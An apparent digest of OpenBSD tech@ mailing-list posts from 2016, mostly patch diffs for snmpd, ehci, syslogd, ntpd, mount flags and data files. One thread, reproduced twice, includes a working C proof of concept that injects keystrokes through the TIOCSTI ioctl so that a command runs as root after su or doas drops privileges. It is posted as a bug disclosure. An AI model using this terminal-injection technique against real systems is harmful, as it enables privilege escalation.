EVP_CipherFinal_ex for snmpd

[David Gwynne]

this gets rid of a linker warning.

the impression i get is that EVP_CipherFinal_ex explicitely does
not do cleanup of the cipher context thing, while EVP_CipherFinal
could if it wanted to.

ok?

Index: usm.c
===
RCS file: /cvs/src/usr.sbin/snmpd/usm.c,v
retrieving revision 1.9
diff -u -p -r1.9 usm.c
--- usm.c   16 Jan 2015 00:05:13 -  1.9
+++ usm.c   2 Oct 2016 05:32:03 -
@@ -605,7 +605,7 @@ usm_crypt(struct snmp_message *msg, u_ch
EVP_CIPHER_CTX_set_padding(, 0);
 
if (EVP_CipherUpdate(, outbuf, , inbuf, inlen) &&
-   EVP_CipherFinal(, outbuf + len, ))
+   EVP_CipherFinal_ex(, outbuf + len, ))
rv = len + len2;
else
rv = -1;

Re: ehci(4)/imxehci(4) diff to switch port into host mode

[Jonathan Gray]

On Sat, Oct 01, 2016 at 03:48:35PM +0200, Mark Kettenis wrote:
> The USB controller on the Freescale i.MX application processors has a
> dual role port that can act as device (OTG) or as host.  Since we
> don't have any device mode support in our kernel, we try to switch the
> port into host mode.  Unfortunately that never worked.  Here's why:
> 
> The USBMODE register that controls the mode, gets reset whenever we
> reset the controller, i.e. when ehci_reset() gets called.  Since
> ehci_init() calls ehci_reset() we lose the host mode setting almost
> immediately, and nothing works.
> 
> The diff below adds code to save and restore the USBMODE register if
> the EHCIF_USBMODE flag is set, and sets this flag in the imxehci(4)
> driver.  I also moved the defines for this register to ehcireg.h.
> While this isn't a standard EHCI register, it seems that it is present
> on many dual-role USB 2.0 controller.  Allegedly it is part of a
> design that ended up being licensed to many other companies.
> 
> Note that the register offset changed from 0xa8 to 0x68.  This is not
> a bug.  Imade the offset relative to the offset given by the
> EHCI_CAPLENGTH register.  It is now accessed using EOREAD4/EOWRITE4
> instead of EREAD4/EWRITE4.
> 
> ok?

The top usb port on the cubox now works with this.  ok jsg@

> 
> 
> Index: arch/armv7/imx/imxehci.c
> ===
> RCS file: /cvs/src/sys/arch/armv7/imx/imxehci.c,v
> retrieving revision 1.17
> diff -u -p -r1.17 imxehci.c
> --- arch/armv7/imx/imxehci.c  13 Aug 2016 11:08:58 -  1.17
> +++ arch/armv7/imx/imxehci.c  1 Oct 2016 13:26:02 -
> @@ -58,9 +58,6 @@
>  /* ehci */
>  #define USB_EHCI_OFFSET  0x100
>  
> -#define EHCI_USBMODE 0xa8
> -
> -#define EHCI_USBMODE_HOST(3 << 0)
>  #define EHCI_PS_PTS_UTMI_MASK((1 << 25) | (3 << 30))
>  
>  /* usb non-core */
> @@ -144,6 +141,7 @@ imxehci_attach(struct device *parent, st
>   sc->sc.iot = faa->fa_iot;
>   sc->sc.sc_bus.dmatag = faa->fa_dmat;
>   sc->sc.sc_size = faa->fa_reg[0].size - USB_EHCI_OFFSET;
> + sc->sc.sc_flags = EHCIF_USBMODE;
>  
>   /* Map I/O space */
>   if (bus_space_map(sc->sc.iot, faa->fa_reg[0].addr,
> @@ -247,8 +245,8 @@ imxehci_attach(struct device *parent, st
>   USBPHY_CTRL_ENUTMILEVEL2 | USBPHY_CTRL_ENUTMILEVEL3);
>  
>   /* set host mode */
> - EWRITE4(>sc, EHCI_USBMODE,
> - EREAD4(>sc, EHCI_USBMODE) | EHCI_USBMODE_HOST);
> + EOWRITE4(>sc, EHCI_USBMODE,
> + EOREAD4(>sc, EHCI_USBMODE) | EHCI_USBMODE_CM_HOST);
>  
>   /* set to UTMI mode */
>   EOWRITE4(>sc, EHCI_PORTSC(1),
> Index: dev/usb/ehci.c
> ===
> RCS file: /cvs/src/sys/dev/usb/ehci.c,v
> retrieving revision 1.193
> diff -u -p -r1.193 ehci.c
> --- dev/usb/ehci.c15 Sep 2016 02:00:17 -  1.193
> +++ dev/usb/ehci.c1 Oct 2016 13:26:02 -
> @@ -1114,7 +1114,7 @@ ehci_activate(struct device *self, int a
>  usbd_status
>  ehci_reset(struct ehci_softc *sc)
>  {
> - u_int32_t hcr;
> + u_int32_t hcr, usbmode;
>   int i;
>  
>   EOWRITE4(sc, EHCI_USBCMD, 0);   /* Halt controller */
> @@ -1128,6 +1128,9 @@ ehci_reset(struct ehci_softc *sc)
>   if (!hcr)
>   printf("%s: halt timeout\n", sc->sc_bus.bdev.dv_xname);
>  
> + if (sc->sc_flags & EHCIF_USBMODE)
> + usbmode = EOREAD4(sc, EHCI_USBMODE);
> +
>   EOWRITE4(sc, EHCI_USBCMD, EHCI_CMD_HCRESET);
>   for (i = 0; i < 100; i++) {
>   usb_delay_ms(>sc_bus, 1);
> @@ -1140,6 +1143,9 @@ ehci_reset(struct ehci_softc *sc)
>   printf("%s: reset timeout\n", sc->sc_bus.bdev.dv_xname);
>   return (USBD_IOERROR);
>   }
> +
> + if (sc->sc_flags & EHCIF_USBMODE)
> + EOWRITE4(sc, EHCI_USBMODE, usbmode);
>  
>   return (USBD_NORMAL_COMPLETION);
>  }
> Index: dev/usb/ehcireg.h
> ===
> RCS file: /cvs/src/sys/dev/usb/ehcireg.h,v
> retrieving revision 1.20
> diff -u -p -r1.20 ehcireg.h
> --- dev/usb/ehcireg.h 10 Apr 2015 13:56:42 -  1.20
> +++ dev/usb/ehcireg.h 1 Oct 2016 13:26:02 -
> @@ -162,6 +162,13 @@
>  
>  #define EHCI_PORT_RESET_COMPLETE 2 /* ms */
>  
> +/* Nonstandard register to set controller mode. */
> +#define EHCI_USBMODE 0x68
> +#define  EHCI_USBMODE_CM_M   0x0003
> +#define  EHCI_USBMODE_CM_IDLE0x
> +#define  EHCI_USBMODE_CM_DEVICE  0x0002
> +#define  EHCI_USBMODE_CM_HOST0x0003  
> +
>  #define EHCI_FLALIGN_ALIGN   0x1000
>  
>  /* No data structure may cross a page boundary. */
> Index: dev/usb/ehcivar.h
> ===
> RCS file: /cvs/src/sys/dev/usb/ehcivar.h,v
> retrieving revision 1.36
> diff -u -p -r1.36 ehcivar.h
> --- dev/usb/ehcivar.h 2 Nov 2015 

Re: Explicitly cast the return variable in tls_load_file()

[Ted Unangst]

Kinichiro Inoguchi wrote:
> I would like to cast the return variable explicitly in tls_load_file().
> This fix also avoiding Intel C++ compiler "assertion failed" described here.
> https://github.com/libressl-portable/portable/issues/209#issuecomment-249587024

This is a compiler bug? The code doesn't change, and there's no bug in the
library that I see.

share/misc: Complete 'airport' and 'inter.phone' for Poland

[Frederic Cambus]

Hi tech@,

This diff adds missing airports and area codes for Poland, and fixes
some erroneous entries.

OK?

Index: share/misc/airport
===
RCS file: /cvs/src/share/misc/airport,v
retrieving revision 1.56
diff -u -p -r1.56 airport
--- share/misc/airport  10 Jul 2016 13:52:27 -  1.56
+++ share/misc/airport  1 Oct 2016 20:37:42 -
@@ -273,6 +273,7 @@ BXU:Butuan, Butuan, Philippines
 BYO:Bonito, Brazil
 BYU:Bindlacher Berg, Bayreuth, Germany
 BZE:Philip S. W. Goldson International, Belize City, Belize
+BZG:Szwederowo, Bydgoszcz, Poland
 BZN:Gallatin Field, Bozeman, Montana, USA
 CAE:Columbia Metropolitan, South Carolina, USA
 CAG:Elmas, Cagliari, Sardinia, Italy
@@ -726,6 +727,7 @@ IAS:Iasi, Romania
 IBZ:Ibiza, Spain
 ICT:Wichita Mid-Continent, Kansas, USA
 IDA:Idaho Falls, Idaho, USA
+IEG:Babimost, Zielona Gora, Poland
 IEV:Kyiv Zhulyany International, Kyiv, Ukraine
 IFO:Ivano-Frankivs'k International, Ivano-Frankivs'k, Ukraine
 IFP:Bullhead City, Arizona, USA
@@ -936,6 +938,7 @@ LCA:Larnaca International, Cyprus
 LCE:La Ceiba International, Honduras
 LCG:La Coruna, Spain
 LCH:Lake Charles, Louisiana, USA
+LCJ:Lublinek, Lodz, Poland
 LCY:London City, England, United Kingdom
 LDB:Londrina, Parana, Brazil
 LDE:Tarbes International, Lourdes/Tarbes, France
@@ -1009,6 +1012,7 @@ LUD:Luderitz, Namibia
 LUG:Agno, Lugano, Switzerland
 LUN:Lusaka, Zambia
 LUX:Findel, Luxembourg
+LUZ:Swidnik, Lublin, Poland
 LVI:Livingstone, Zambia
 LVK:Livermore, California, USA
 LWB:Greenbrier Valley, West Virginia, USA
@@ -1345,7 +1349,7 @@ POP:La Union, Puerto Plata, Dominican Re
 POR:Pori, Finland
 POS:Port Of Spain, Trinidad
 POU:Dutchess County, Poughkeepsie, New York, USA
-POZ:Lawica, Poznan, Poland
+POZ:Poznan, Poland
 PPG:Pago Pago International, American Samoa
 PPS:Puerto Princesa, Philippines
 PPT:Pape'ete, Tahiti, French Polynesia
@@ -1406,6 +1410,7 @@ RCB:Richards Bay, South Africa
 RCE:Roche Harbor, Washington, USA
 RDD:Redding, California, USA
 RDG:Reading Municipal / Spaatz Field, Pennsylvania, USA
+RDO:Sadkow, Radom, Poland
 RDU:Raleigh-Durham, North Carolina, USA
 REC:Guararapes International, Recife, Pernambuco, Brazil
 REG:Tito Menniti, Reggio Calabria, Italy
@@ -1457,6 +1462,7 @@ RUN:Roland Garros Airport, Reunion Islan
 RUT:Rutland, Vermont, USA
 RWI:Wilson, Rocky Mount, North Carolina, USA
 RWN:Rivne International, Rivne, Ukraine
+RZE:Jasionka, Rzeszow, Poland
 SAB:Saba Island, Netherlands Antilles
 SAF:Santa Fe, New Mexico, USA
 SAH:Sanaa International, Yemen
@@ -1620,6 +1626,7 @@ SZG:Salzburg, Austria
 SZR:Stara Zagora, Bulgaria
 SZS:Ryan's Creek, Stewart Island, New Zealand
 SZX:Shenzhen, China
+SZY:Szymany, Olsztyn, Poland
 SZZ:Goleniow, Szczecin, Poland
 TAB:Crown Point, Tobago, Trinidad And Tobago
 TAC:Dz Romualdez, Tacloban, Philippines
@@ -1815,6 +1822,7 @@ WIL:Wilson, Nairobi, Kenya
 WIN:Winton, Queensland, Australia
 WLG:Wellington International, New Zealand
 WMH:Mountain Home, Arkansas, USA
+WMI:Modlin, Warsaw, Poland
 WNA:Napakiak, Alaska, USA
 WRL:Worland, Wyoming, USA
 WRO:Strachowice, Wroclaw, Poland
Index: share/misc/inter.phone
===
RCS file: /cvs/src/share/misc/inter.phone,v
retrieving revision 1.42
diff -u -p -r1.42 inter.phone
--- share/misc/inter.phone  9 Jul 2016 23:32:51 -   1.42
+++ share/misc/inter.phone  1 Oct 2016 20:37:42 -
@@ -1711,10 +1711,55 @@
 47:2:Oslo:Norway
 47:5:Bergen:Norway
 47:7:Trondheim:Norway
-48:12:Crakow:Poland
+48:12:Krakow:Poland
+48:13:Krosno:Poland
+48:14:Tarnow:Poland
+48:15:Tarnobrzeg:Poland
+48:16:Przemysl:Poland
+48:17:Rzeszow:Poland
+48:18:Nowy Sacz:Poland
 48:22:Warsaw:Poland
+48:23:Ciechanow:Poland
+48:24:Plock:Poland
+48:25:Siedlce:Poland
+48:29:Ostroleka:Poland
+48:32:Katowice:Poland
+48:33:Bielsko-Biala:Poland
+48:34:Czestochowa:Poland
+48:41:Kielce:Poland
 48:42:Lodz:Poland
+48:43:Sieradz:Poland
+48:44:Piotrkow Trybunalski:Poland
+48:46:Skierniewice:Poland
+48:48:Radom:Poland
+48:52:Bydgoszcz:Poland
+48:54:Wloclawek:Poland
+48:55:Elblag:Poland
+48:56:Torun:Poland
 48:58:Gdansk:Poland
+48:59:Slupsk:Poland
+48:61:Poznan:Poland
+48:62:Kalisz:Poland
+48:63:Konin:Poland
+48:65:Leszno:Poland
+48:67:Pila:Poland
+48:68:Zielona Gora:Poland
+48:71:Wroclaw:Poland
+48:74:Walbrzych:Poland
+48:75:Jelenia Gora:Poland
+48:76:Legnica:Poland
+48:77:Opole:Poland
+48:81:Lublin:Poland
+48:82:Chelm:Poland
+48:83:Biala Podlaska:Poland
+48:84:Zamosc:Poland
+48:85:Bialystok:Poland
+48:86:Lomza:Poland
+48:87:Suwalki:Poland
+48:89:Olsztyn:Poland
+48:91:Szczecin:Poland
+48:94:Koszalin:Poland
+48:95:Gorzow Wielkopolski:Poland
 49:201:Essen:Germany
 49:202:Wuppertal:Germany
 49:203:Duisburg:Germany

Re: Unexpected behavior in su/doas

[Theo de Raadt]

> I stumbled upon unexpected behavior on OpenBSD 6.0 (all patches)
> which seems to allow running commands as the original user when
> using su and doas interactively because the controlling terminal
> is the same.

Use of su, doas, or sudo -- means you EXPLICITLY want the tty to
remain the same.

> The following binary is used to test this and compiled as
> /tmp/a.out:
> 
> #include 
> #include 
> 
> char s[] =3D "echo Payload as $(whoami)\n";
> 
> void main(void) {
> printf("uid: %d\n", getuid());
> 
> char *c =3D s;
> int i =3D 0;
> int tty =3D open("/dev/tty", 0);
> 
> do {
> ioctl(tty, TIOCSTI, c);
> c++;
> } while (*c);
> 
> return;
> }
> 
> Now running su builder -c /tmp/a.out (where builder is just a
> normal user with a shell) results in:
> 
> # su builder -c /tmp/a.out
> uid: 1000
> echo Payload as $(whoami)
> # echo Payload as $(whoami)
> Payload as root
> 
> Similar happens with doas and the following config:
> 
> # cat /etc/doas.conf
> permit nopass root as builder
> 
> # doas -u builder /tmp/a.out
> uid: 1000
> echo Payload as $(whoami)
> # echo Payload as $(whoami)
> Payload as root
> 
> Is this behavior expected and if so, how do I run commands from
> root as an untrusted user? It's not mentioned in the man page
> that using su/doas as root might allow other users to run code as
> root.

It sounds as if you don't understand what happens.

The command gets run afterwards.

> Similar behavior is also mentioned in an old (and unfixed) Debian
> bug [1].

So what is learned here?

De-escalation using these "sudo" or "doas" like tools on a tty is
somewhat unsafe - it has always been unsafe - because tty's have
capabilities.

If you wish to be safer, do these operations without retaining access
to a tty.

Escalation on the other hand (user -> root) is different, because then
it is clear you want to do more / everything.  But de-escalation is a
joke.

This is just one mechanism on tty, there are others.  On other
descriptors there are other abilities.

I don't have an answer.

Unexpected behavior in su/doas

[Simon Ruderich]

Hello,

I stumbled upon unexpected behavior on OpenBSD 6.0 (all patches)
which seems to allow running commands as the original user when
using su and doas interactively because the controlling terminal
is the same.

The following binary is used to test this and compiled as
/tmp/a.out:

#include 
#include 

char s[] = "echo Payload as $(whoami)\n";

void main(void) {
printf("uid: %d\n", getuid());

char *c = s;
int i = 0;
int tty = open("/dev/tty", 0);

do {
ioctl(tty, TIOCSTI, c);
c++;
} while (*c);

return;
}

Now running su builder -c /tmp/a.out (where builder is just a
normal user with a shell) results in:

# su builder -c /tmp/a.out
uid: 1000
echo Payload as $(whoami)
# echo Payload as $(whoami)
Payload as root

Similar happens with doas and the following config:

# cat /etc/doas.conf
permit nopass root as builder

# doas -u builder /tmp/a.out
uid: 1000
echo Payload as $(whoami)
# echo Payload as $(whoami)
Payload as root

Is this behavior expected and if so, how do I run commands from
root as an untrusted user? It's not mentioned in the man page
that using su/doas as root might allow other users to run code as
root.

Similar behavior is also mentioned in an old (and unfixed) Debian
bug [1].

Regards
Simon

[1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=628843
-- 
+ privacy is necessary
+ using gnupg http://gnupg.org
+ public key id: 0x92FEFDB7E44C32F9


signature.asc
Description: PGP signature

Re: syslogd fork+exec

[Rafael Zalamena]

On Thu, Sep 29, 2016 at 08:09:23PM +0200, Alexander Bluhm wrote:
> Hi,
> 
> With this diff syslogd(8) does an exec on itself in the privileged
> parent process to reshuffle its memory layout.
> 
> As syslogd only forks once, it does not really matter wether we
> fork+exec in the child or in the parent.  To do it in the parent
> is easier as it has much less state.
> 
> ok?
> 
> bluhm

Your diffs looks good and you made me realize that I should use dup3()
instead of dup2() to create children socket.

Short explanation for outsiders: dup2(fd1, fd2) duplicates fd1 onto fd2
removing CLOEXEC flags, except if fd1 == fd2, then in that case the fd
will remain with CLOEXEC and things will not work. This is not the case
with httpd(8), relayd(8), ntpd(8) and switchd(8), but since code might
be copied around it would be good to fix this there.

I'm using this diff and it works in my default configuration, but since
I'm not familiar with syslogd I don't feel confortable giving oks here.

I made one comment inline in the snipped diff below.

> 
> Index: usr.sbin/syslogd/privsep.c
> ===
> RCS file: /data/mirror/openbsd/cvs/src/usr.sbin/syslogd/privsep.c,v
> retrieving revision 1.61
> diff -u -p -r1.61 privsep.c
> --- usr.sbin/syslogd/privsep.c28 Jun 2016 18:22:50 -  1.61
> +++ usr.sbin/syslogd/privsep.c29 Sep 2016 17:55:03 -
> @@ -194,38 +162,87 @@ priv_init(char *conf, int numeric, int l
>   if (fd_unix[i] != -1)
>   close(fd_unix[i]);
>  
> - /* Save the config file specified by the child process */
> - if (strlcpy(config_file, conf, sizeof config_file) >= 
> sizeof(config_file))
> - errx(1, "config_file truncation");
> + if (dup3(socks[0], 3, 0) == -1)
> + err(1, "dup3 priv sock failed");
> + snprintf(childnum, sizeof(childnum), "%d", child_pid);
> + if ((privargv = reallocarray(NULL, argc + 3, sizeof(char *))) == NULL)
> + err(1, "alloc priv argv failed");
> + for (i = 0; i < argc; i++)
> + privargv[i] = argv[i];
> + privargv[i++] = "-P";
> + privargv[i++] = childnum;
> + privargv[i++] = NULL;
> + execv(privargv[0], privargv);
> + err(1, "exec priv '%s' failed", privargv[0]);
> +}
>  
> - if (stat(config_file, _info) < 0)
> - err(1, "stat config file failed");
> +__dead void
> +priv_exec(char *conf, int numeric, int child, int argc, char *argv[])
> +{
> + int i, fd, sock, cmd, addr_len, result, restart;
> + size_t path_len, protoname_len, hostname_len, servname_len;
> + char path[PATH_MAX], protoname[5];
> + char hostname[NI_MAXHOST], servname[NI_MAXSERV];
> + struct sockaddr_storage addr;
> + struct stat cf_info, cf_stat;
> + struct addrinfo hints, *res0;
> + struct sigaction sa;
>  
> - /* Save whether or not the child can have access to getnameinfo(3) */
> - if (numeric > 0)
> - allow_getnameinfo = 0;
> - else
> - allow_getnameinfo = 1;
> + if (pledge("stdio rpath wpath cpath dns getpw sendfd id proc exec",
> + NULL) == -1)
> + err(1, "pledge priv");
> +
> + if (argc <= 2 || strcmp("-P", argv[argc - 2]) != 0)
> + errx(1, "exec without priv");
> + argv[argc -= 2] = NULL;
> +
> + sock = 3;
> + for (fd = 4; fd < 1024; fd++)
> + close(fd);

This could be replaced with "closefrom(4);".

> +
> + child_pid = child;
> +
> + memset(, 0, sizeof(sa));
> + sigemptyset(_mask);
> + sa.sa_flags = SA_RESTART;
> + sa.sa_handler = SIG_DFL;
> + for (i = 1; i < _NSIG; i++)
> + sigaction(i, , NULL);
> +
> + /* Pass TERM/HUP/INT/QUIT through to child, and accept CHLD */
> + sa.sa_handler = sig_pass_to_chld;
> + sigaction(SIGTERM, , NULL);
> + sigaction(SIGHUP, , NULL);
> + sigaction(SIGINT, , NULL);
> + sigaction(SIGQUIT, , NULL);
> + sa.sa_handler = sig_got_chld;
> + sa.sa_flags |= SA_NOCLDSTOP;
> + sigaction(SIGCHLD, , NULL);
> +
> + setproctitle("[priv]");
> +
> + if (stat(conf, _info) < 0)
> + err(1, "stat config file failed");
>  
>   TAILQ_INIT();
>   increase_state(STATE_CONFIG);
>   restart = 0;
>  
>   while (cur_state < STATE_QUIT) {
> - if (may_read(socks[0], , sizeof(int)))
> + if (may_read(sock, , sizeof(int)))
>   break;
>   switch (cmd) {
>   case PRIV_OPEN_TTY:
>   logdebug("[priv]: msg PRIV_OPEN_TTY received\n");
>   /* Expecting: length, path */
> - must_read(socks[0], _len, sizeof(size_t));
> + must_read(sock, _len, sizeof(size_t));
>   if (path_len == 0 || path_len > sizeof(path))
>   _exit(1);
> - must_read(socks[0], , path_len);
> +   

ntpd(8): use stack instead of heap

[Rafael Zalamena]

The ntpd(8) constraint fork+exec diff changed the way the constraint
processes are created, but then it introduced new calloc()s to avoid
increasing diff size and to focus on the problem. Now that the fork+exec
is in, this diff make those variables to become a part of the stack.

No functional changes, just changing variables storage location.

ok?


Index: constraint.c
===
RCS file: /home/obsdcvs/src/usr.sbin/ntpd/constraint.c,v
retrieving revision 1.32
diff -u -p -r1.32 constraint.c
--- constraint.c26 Sep 2016 17:17:01 -  1.32
+++ constraint.c1 Oct 2016 18:54:35 -
@@ -317,8 +317,8 @@ priv_constraint_readquery(struct constra
 void
 priv_constraint_child(const char *pw_dir, uid_t pw_uid, gid_t pw_gid)
 {
-   struct constraint   *cstr;
-   struct ntp_addr_msg *am;
+   struct constraintcstr;
+   struct ntp_addr_msg  am;
uint8_t *data;
static char  addr[NI_MAXHOST];
struct timeval   rectv, xmttv;
@@ -332,10 +332,6 @@ priv_constraint_child(const char *pw_dir
if (setpriority(PRIO_PROCESS, 0, 0) == -1)
log_warn("could not set priority");
 
-   if ((cstr = calloc(1, sizeof(*cstr))) == NULL ||
-   (am = calloc(1, sizeof(*am))) == NULL)
-   fatal("%s: calloc", __func__);
-
/* Init TLS and load CA certs before chroot() */
if (tls_init() == -1)
fatalx("tls_init");
@@ -364,9 +360,9 @@ priv_constraint_child(const char *pw_dir
if (pledge("stdio inet", NULL) == -1)
fatal("pledge");
 
-   cstr->fd = CONSTRAINT_PASSFD;
-   imsg_init(>ibuf, cstr->fd);
-   priv_constraint_readquery(cstr, am, );
+   cstr.fd = CONSTRAINT_PASSFD;
+   imsg_init(, cstr.fd);
+   priv_constraint_readquery(, , );
 
/*
 * Get the IP address as name and set the process title accordingly.
@@ -374,8 +370,8 @@ priv_constraint_child(const char *pw_dir
 * any DNS operation, so it is safe to be called without the dns
 * pledge.
 */
-   if (getnameinfo((struct sockaddr *)>addr->ss,
-   SA_LEN((struct sockaddr *)>addr->ss),
+   if (getnameinfo((struct sockaddr *)>ss,
+   SA_LEN((struct sockaddr *)>ss),
addr, sizeof(addr), NULL, 0,
NI_NUMERICHOST) != 0)
fatalx("%s getnameinfo", __func__);
@@ -394,21 +390,21 @@ priv_constraint_child(const char *pw_dir
fatal("%s fcntl F_SETFD", __func__);
 
/* Get remaining data from imsg in the unpriv child */
-   if (am->namelen) {
-   if ((cstr->addr_head.name =
-   get_string(data, am->namelen)) == NULL)
+   if (am.namelen) {
+   if ((cstr.addr_head.name =
+   get_string(data, am.namelen)) == NULL)
fatalx("invalid IMSG_CONSTRAINT_QUERY name");
-   data += am->namelen;
+   data += am.namelen;
}
-   if (am->pathlen) {
-   if ((cstr->addr_head.path =
-   get_string(data, am->pathlen)) == NULL)
+   if (am.pathlen) {
+   if ((cstr.addr_head.path =
+   get_string(data, am.pathlen)) == NULL)
fatalx("invalid IMSG_CONSTRAINT_QUERY path");
}
 
/* Run! */
if ((ctx = httpsdate_query(addr,
-   CONSTRAINT_PORT, cstr->addr_head.name, cstr->addr_head.path,
+   CONSTRAINT_PORT, cstr.addr_head.name, cstr.addr_head.path,
conf->ca, conf->ca_len, , )) == NULL) {
/* Abort with failure but without warning */
exit(1);
@@ -418,9 +414,9 @@ priv_constraint_child(const char *pw_dir
iov[0].iov_len = sizeof(rectv);
iov[1].iov_base = 
iov[1].iov_len = sizeof(xmttv);
-   imsg_composev(>ibuf,
+   imsg_composev(,
IMSG_CONSTRAINT_RESULT, 0, 0, -1, iov, 2);
-   imsg_flush(>ibuf);
+   imsg_flush();
 
/* Tear down the TLS connection after sending the result */
httpsdate_free(ctx);

stricter sys_mount() flag handling

[Martin Natano]

After committing the new MNT_NOPERM flag I got some complaints that my
code doesn't work by people that recompiled mount_ffs, but didn't reboot
to the new kernel. I don't blame them; in that situation sys_mount()
silently ignores the unknown flag. IMHO we should check the flags more
strictly. Ok?

natano


Index: sys/mount.h
===
RCS file: /cvs/src/sys/sys/mount.h,v
retrieving revision 1.127
diff -u -p -r1.127 mount.h
--- sys/mount.h 10 Sep 2016 16:53:30 -  1.127
+++ sys/mount.h 1 Oct 2016 15:36:11 -
@@ -414,6 +414,11 @@ struct mount {
 #define MNT_DOOMED 0x0800  /* device behind filesystem is gone */
 
 /*
+ * All mount flags.
+ */
+#defineMNT_FLAGMASK0x0e0f
+
+/*
  * Flags for various system call interfaces.
  *
  * waitfor flags to vfs_sync() and getfsstat()
Index: kern/vfs_syscalls.c
===
RCS file: /cvs/src/sys/kern/vfs_syscalls.c,v
retrieving revision 1.265
diff -u -p -r1.265 vfs_syscalls.c
--- kern/vfs_syscalls.c 10 Sep 2016 16:53:30 -  1.265
+++ kern/vfs_syscalls.c 1 Oct 2016 15:36:11 -
@@ -117,6 +117,9 @@ sys_mount(struct proc *p, void *v, regis
if ((error = suser(p, 0)))
return (error);
 
+   if (flags & ~MNT_FLAGMASK)
+   return (EINVAL);
+
/*
 * Mount points must fit in MNAMELEN, not MAXPATHLEN.
 */

ehci(4)/imxehci(4) diff to switch port into host mode

[Mark Kettenis]

The USB controller on the Freescale i.MX application processors has a
dual role port that can act as device (OTG) or as host.  Since we
don't have any device mode support in our kernel, we try to switch the
port into host mode.  Unfortunately that never worked.  Here's why:

The USBMODE register that controls the mode, gets reset whenever we
reset the controller, i.e. when ehci_reset() gets called.  Since
ehci_init() calls ehci_reset() we lose the host mode setting almost
immediately, and nothing works.

The diff below adds code to save and restore the USBMODE register if
the EHCIF_USBMODE flag is set, and sets this flag in the imxehci(4)
driver.  I also moved the defines for this register to ehcireg.h.
While this isn't a standard EHCI register, it seems that it is present
on many dual-role USB 2.0 controller.  Allegedly it is part of a
design that ended up being licensed to many other companies.

Note that the register offset changed from 0xa8 to 0x68.  This is not
a bug.  Imade the offset relative to the offset given by the
EHCI_CAPLENGTH register.  It is now accessed using EOREAD4/EOWRITE4
instead of EREAD4/EWRITE4.

ok?


Index: arch/armv7/imx/imxehci.c
===
RCS file: /cvs/src/sys/arch/armv7/imx/imxehci.c,v
retrieving revision 1.17
diff -u -p -r1.17 imxehci.c
--- arch/armv7/imx/imxehci.c13 Aug 2016 11:08:58 -  1.17
+++ arch/armv7/imx/imxehci.c1 Oct 2016 13:26:02 -
@@ -58,9 +58,6 @@
 /* ehci */
 #define USB_EHCI_OFFSET0x100
 
-#define EHCI_USBMODE   0xa8
-
-#define EHCI_USBMODE_HOST  (3 << 0)
 #define EHCI_PS_PTS_UTMI_MASK  ((1 << 25) | (3 << 30))
 
 /* usb non-core */
@@ -144,6 +141,7 @@ imxehci_attach(struct device *parent, st
sc->sc.iot = faa->fa_iot;
sc->sc.sc_bus.dmatag = faa->fa_dmat;
sc->sc.sc_size = faa->fa_reg[0].size - USB_EHCI_OFFSET;
+   sc->sc.sc_flags = EHCIF_USBMODE;
 
/* Map I/O space */
if (bus_space_map(sc->sc.iot, faa->fa_reg[0].addr,
@@ -247,8 +245,8 @@ imxehci_attach(struct device *parent, st
USBPHY_CTRL_ENUTMILEVEL2 | USBPHY_CTRL_ENUTMILEVEL3);
 
/* set host mode */
-   EWRITE4(>sc, EHCI_USBMODE,
-   EREAD4(>sc, EHCI_USBMODE) | EHCI_USBMODE_HOST);
+   EOWRITE4(>sc, EHCI_USBMODE,
+   EOREAD4(>sc, EHCI_USBMODE) | EHCI_USBMODE_CM_HOST);
 
/* set to UTMI mode */
EOWRITE4(>sc, EHCI_PORTSC(1),
Index: dev/usb/ehci.c
===
RCS file: /cvs/src/sys/dev/usb/ehci.c,v
retrieving revision 1.193
diff -u -p -r1.193 ehci.c
--- dev/usb/ehci.c  15 Sep 2016 02:00:17 -  1.193
+++ dev/usb/ehci.c  1 Oct 2016 13:26:02 -
@@ -1114,7 +1114,7 @@ ehci_activate(struct device *self, int a
 usbd_status
 ehci_reset(struct ehci_softc *sc)
 {
-   u_int32_t hcr;
+   u_int32_t hcr, usbmode;
int i;
 
EOWRITE4(sc, EHCI_USBCMD, 0);   /* Halt controller */
@@ -1128,6 +1128,9 @@ ehci_reset(struct ehci_softc *sc)
if (!hcr)
printf("%s: halt timeout\n", sc->sc_bus.bdev.dv_xname);
 
+   if (sc->sc_flags & EHCIF_USBMODE)
+   usbmode = EOREAD4(sc, EHCI_USBMODE);
+
EOWRITE4(sc, EHCI_USBCMD, EHCI_CMD_HCRESET);
for (i = 0; i < 100; i++) {
usb_delay_ms(>sc_bus, 1);
@@ -1140,6 +1143,9 @@ ehci_reset(struct ehci_softc *sc)
printf("%s: reset timeout\n", sc->sc_bus.bdev.dv_xname);
return (USBD_IOERROR);
}
+
+   if (sc->sc_flags & EHCIF_USBMODE)
+   EOWRITE4(sc, EHCI_USBMODE, usbmode);
 
return (USBD_NORMAL_COMPLETION);
 }
Index: dev/usb/ehcireg.h
===
RCS file: /cvs/src/sys/dev/usb/ehcireg.h,v
retrieving revision 1.20
diff -u -p -r1.20 ehcireg.h
--- dev/usb/ehcireg.h   10 Apr 2015 13:56:42 -  1.20
+++ dev/usb/ehcireg.h   1 Oct 2016 13:26:02 -
@@ -162,6 +162,13 @@
 
 #define EHCI_PORT_RESET_COMPLETE 2 /* ms */
 
+/* Nonstandard register to set controller mode. */
+#define EHCI_USBMODE   0x68
+#define  EHCI_USBMODE_CM_M 0x0003
+#define  EHCI_USBMODE_CM_IDLE  0x
+#define  EHCI_USBMODE_CM_DEVICE0x0002
+#define  EHCI_USBMODE_CM_HOST  0x0003  
+
 #define EHCI_FLALIGN_ALIGN 0x1000
 
 /* No data structure may cross a page boundary. */
Index: dev/usb/ehcivar.h
===
RCS file: /cvs/src/sys/dev/usb/ehcivar.h,v
retrieving revision 1.36
diff -u -p -r1.36 ehcivar.h
--- dev/usb/ehcivar.h   2 Nov 2015 14:55:41 -   1.36
+++ dev/usb/ehcivar.h   1 Oct 2016 13:26:02 -
@@ -130,6 +130,7 @@ struct ehci_softc {
int sc_flags;   /* misc flags */
 #define EHCIF_DROPPED_INTR_WORKAROUND  0x01
 #define EHCIF_PCB_INTR 0x02
+#define EHCIF_USBMODE  

Explicitly cast the return variable in tls_load_file()

[Kinichiro Inoguchi]

I would like to cast the return variable explicitly in tls_load_file().
This fix also avoiding Intel C++ compiler "assertion failed" described here.
https://github.com/libressl-portable/portable/issues/209#issuecomment-249587024

ok ?
Index: tls_util.c
===
RCS file: /cvs/src/lib/libtls/tls_util.c,v
retrieving revision 1.3
diff -u -p -r1.3 tls_util.c
